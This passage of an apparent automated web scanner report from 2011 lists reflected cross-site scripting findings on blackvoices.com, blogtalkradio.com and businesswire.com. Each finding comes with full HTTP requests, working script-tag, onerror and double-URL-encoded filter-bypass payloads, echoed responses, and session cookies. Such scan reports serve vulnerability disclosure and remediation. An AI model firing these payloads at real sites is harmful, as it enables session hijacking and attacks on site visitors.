s_265.prop12="http://www.blackvoices.com/$|http:f7a4b\"-alert(1)-\"dcd72038d6b/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertain
...[SNIP]...

1.115. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90b4c</script><script>alert(1)</script>6bd848177d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com90b4c</script><script>alert(1)</script>6bd848177d1/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240247308.903299917.363268352; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Mon, 31 Jan 2011 19:23:31 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm02 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
Not Found";
s_265.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com90b4c</script><script>alert(1)</script>6bd848177d1/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternal
...[SNIP]...

1.116. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42d86</script><script>alert(1)</script>e73cbe4e8cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*42d86</script><script>alert(1)</script>e73cbe4e8cc/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=3240378380.3805758285.1186990336; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Mon, 31 Jan 2011 19:23:32 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm04 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
.channel="us.bv";
s_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*42d86</script><script>alert(1)</script>e73cbe4e8cc/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.117. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfa82</script><script>alert(1)</script>12dd697aac6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.comcfa82</script><script>alert(1)</script>12dd697aac6/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393165244.2413314893.1482885632; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Mon, 31 Jan 2011 19:23:33 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld04 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
_265.trackExternalLinks="true";
s_265.prop1="$|http:";
s_265.pfxID="bkv";
s_265.disablepihost=false;
s_265.prop12="http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.comcfa82</script><script>alert(1)</script>12dd697aac6/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video";
s_265.linkInternalFilters="javascript:,aol.com,blackvoi
...[SNIP]...

1.118. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blackvoices.com
Path:   /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69562</script><script>alert(1)</script>aa30d423751 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video69562</script><script>alert(1)</script>aa30d423751 HTTP/1.1
Host: www.blackvoices.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
set-cookie: dcisid=2393165244.2413314893.1600326144; path=/
X-RSP: 1
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Mon, 31 Jan 2011 19:23:35 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 31107
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-ld04 -->
<html xmlns="http://www.w3.org/1999/xhtm
...[SNIP]...
|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video69562</script><script>alert(1)</script>aa30d423751";
s_265.linkInternalFilters="javascript:,aol.com,blackvoices.com";
var s_code=s_265.t();
if(s_code)document.write(s_code)
-->
...[SNIP]...

1.119. http://www.blogtalkradio.com/ajax2.aspx [JSONCallback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogtalkradio.com
Path:   /ajax2.aspx

Issue detail

The value of the JSONCallback request parameter is copied into the HTML document as plain text between tags. The payload 3a520<script>alert(1)</script>551eb5a8d72 was submitted in the JSONCallback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ajax2.aspx?arg=onairmenu&ctx=ulOnAir&JSONCallback=jsonp12965078065773a520<script>alert(1)</script>551eb5a8d72&_=1296508130560 HTTP/1.1
Host: www.blogtalkradio.com
Proxy-Connection: keep-alive
Referer: http://www.blogtalkradio.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _initReferrer=_initReferrer=http://www.google.com/search?hl=en&q=8c2cd'-alert(document.cookie)-'2906292c620; BTRAnon=NLm9CRz4ywEkAAAAN2NlZTI4Y2QtOGZhMy00M2MyLWE3YmEtNTM0N2RkMGRkNDg4QM84Vsk86Bgp8UmIoLKhsC2liTk1; ASP.NET_SessionId=gtf1zujuc2e4rvzf2es3q545; BTRListenGUID=da81759c-986d-4b69-a654-53765d67e98d; BTRJSTZOffset=-360; BTRJSDSTOffset=-300; utag_main=_st:1296509630546$ses_id:1296508370635%3Bexp-session; __qca=P0-519510845-1296507831625; __utmz=247705172.1296507833.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=247705172.1156932918.1296507833.1296507833.1296507833.1; __utmc=247705172; __utmb=247705172.1.10.1296507833; __ptca=16192809.KUht51crVzKm.1296529435.1296529435.1296529435.1; __ptcc=1; __ptcs=16192809.1.10.1296529435; __ptcz=16192809.1296529435.1.0.ptmcsr=(direct)|ptmcmd=(none)|ptmccn=(direct)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 31 Jan 2011 21:10:54 GMT
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
Server: WWW3
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Connection: close

jsonp12965078065773a520<script>alert(1)</script>551eb5a8d72({"success":{"arg":"onairmenu","ctx":"ulOnAir","html":"<li class=\"first\" ><a class=\"sfirst\" href=\"\/freedomizerradio\/2011\/01\/31\/90mi
...[SNIP]...

1.120. http://www.blogtalkradio.com/ajax2.aspx [ctx parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blogtalkradio.com
Path:   /ajax2.aspx

Issue detail

The value of the ctx request parameter is copied into the HTML document as plain text between tags. The payload a0504<img%20src%3da%20onerror%3dalert(1)>fd0e7e7d201 was submitted in the ctx parameter. This input was echoed as a0504<img src=a onerror=alert(1)>fd0e7e7d201 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /ajax2.aspx?arg=onairmenu&ctx=ulOnAira0504<img%20src%3da%20onerror%3dalert(1)>fd0e7e7d201&JSONCallback=jsonp1296507806577&_=1296508130560 HTTP/1.1
Host: www.blogtalkradio.com
Proxy-Connection: keep-alive
Referer: http://www.blogtalkradio.com/
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _initReferrer=_initReferrer=http://www.google.com/search?hl=en&q=8c2cd'-alert(document.cookie)-'2906292c620; BTRAnon=NLm9CRz4ywEkAAAAN2NlZTI4Y2QtOGZhMy00M2MyLWE3YmEtNTM0N2RkMGRkNDg4QM84Vsk86Bgp8UmIoLKhsC2liTk1; ASP.NET_SessionId=gtf1zujuc2e4rvzf2es3q545; BTRListenGUID=da81759c-986d-4b69-a654-53765d67e98d; BTRJSTZOffset=-360; BTRJSDSTOffset=-300; utag_main=_st:1296509630546$ses_id:1296508370635%3Bexp-session; __qca=P0-519510845-1296507831625; __utmz=247705172.1296507833.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; __utma=247705172.1156932918.1296507833.1296507833.1296507833.1; __utmc=247705172; __utmb=247705172.1.10.1296507833; __ptca=16192809.KUht51crVzKm.1296529435.1296529435.1296529435.1; __ptcc=1; __ptcs=16192809.1.10.1296529435; __ptcz=16192809.1296529435.1.0.ptmcsr=(direct)|ptmcmd=(none)|ptmccn=(direct)

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 31 Jan 2011 21:10:53 GMT
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
Server: WWW12
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Connection: close

jsonp1296507806577({"success":{"arg":"onairmenu","ctx":"ulOnAira0504<img src=a onerror=alert(1)>fd0e7e7d201","html":"<li class=\"first\" ><a class=\"sfirst\" href=\"\/freedomizerradio\/2011\/01\/31\/9
...[SNIP]...

1.121. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5cbc0%253cscript%253ealert%25281%2529%253c%252fscript%253e479a6403fac was submitted in the REST URL parameter 3. This input was echoed as 5cbc0<script>alert(1)</script>479a6403fac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/201101270061925cbc0%253cscript%253ealert%25281%2529%253c%252fscript%253e479a6403fac/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming HTTP/1.1
Host: www.businesswire.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:13:56 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=xv2JNGtJMhzDwryh1n3ytP3lgJPHpjY2gST0sDhHvG0C2jb0Jf1v!1321864744!-1789265175; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 22343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 201101270061925cbc0<script>alert(1)</script>479a6403fac and language = en.</span>
...[SNIP]...

1.122. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f984c%253cscript%253ealert%25281%2529%253c%252fscript%253edd66a2a361d was submitted in the REST URL parameter 4. This input was echoed as f984c<script>alert(1)</script>dd66a2a361d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110127006192/enf984c%253cscript%253ealert%25281%2529%253c%252fscript%253edd66a2a361d/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming HTTP/1.1
Host: www.businesswire.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:13:57 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=gkHwNGtVg9TBbhBH5VnXTRhqhzdypKcY9KxLLhJj1Qzy1NQNyJhL!-2063012567!1321864744; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Length: 22343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110127006192 and language = enf984c<script>alert(1)</script>dd66a2a361d.</span>
...[SNIP]...

1.123. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c3acb%253cscript%253ealert%25281%2529%253c%252fscript%253e5906f30c114 was submitted in the REST URL parameter 3. This input was echoed as c3acb<script>alert(1)</script>5906f30c114 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110127006192c3acb%253cscript%253ealert%25281%2529%253c%252fscript%253e5906f30c114/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:37 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=hk8QNHMVvlKKvnqF3NsLtzYMKv92hJDG6nCD8th2fZ2QkBLmdNhG!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Connection: close
Content-Length: 22343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110127006192c3acb<script>alert(1)</script>5906f30c114 and language = en.</span>
...[SNIP]...

1.124. http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38c53%253cscript%253ealert%25281%2529%253c%252fscript%253ec658d7d2df2 was submitted in the REST URL parameter 4. This input was echoed as 38c53<script>alert(1)</script>c658d7d2df2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110127006192/en38c53%253cscript%253ealert%25281%2529%253c%252fscript%253ec658d7d2df2/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming/x22 HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:42 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=6HxzNHMhTwsn2NLbzvqLnVp3DBTCldHg32f1WmPJqngpjQ9sFBvz!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Connection: close
Content-Length: 22343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110127006192 and language = en38c53<script>alert(1)</script>c658d7d2df2.</span>
...[SNIP]...

1.125. http://www.businesswire.com/news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 850ba%253cscript%253ealert%25281%2529%253c%252fscript%253ed36770b8b1f was submitted in the REST URL parameter 3. This input was echoed as 850ba<script>alert(1)</script>d36770b8b1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110131005660850ba%253cscript%253ealert%25281%2529%253c%252fscript%253ed36770b8b1f/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:28 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=JrpBNHMMFN2n2z5vSJMTlfC94k0h1VGSk46nKQGfzvsVLVvXf6yR!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Connection: close
Content-Length: 22343

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110131005660850ba<script>alert(1)</script>d36770b8b1f and language = en.</span>
...[SNIP]...

1.126. http://www.businesswire.com/news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /news/home/20110131005660/en/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp

Issue detail

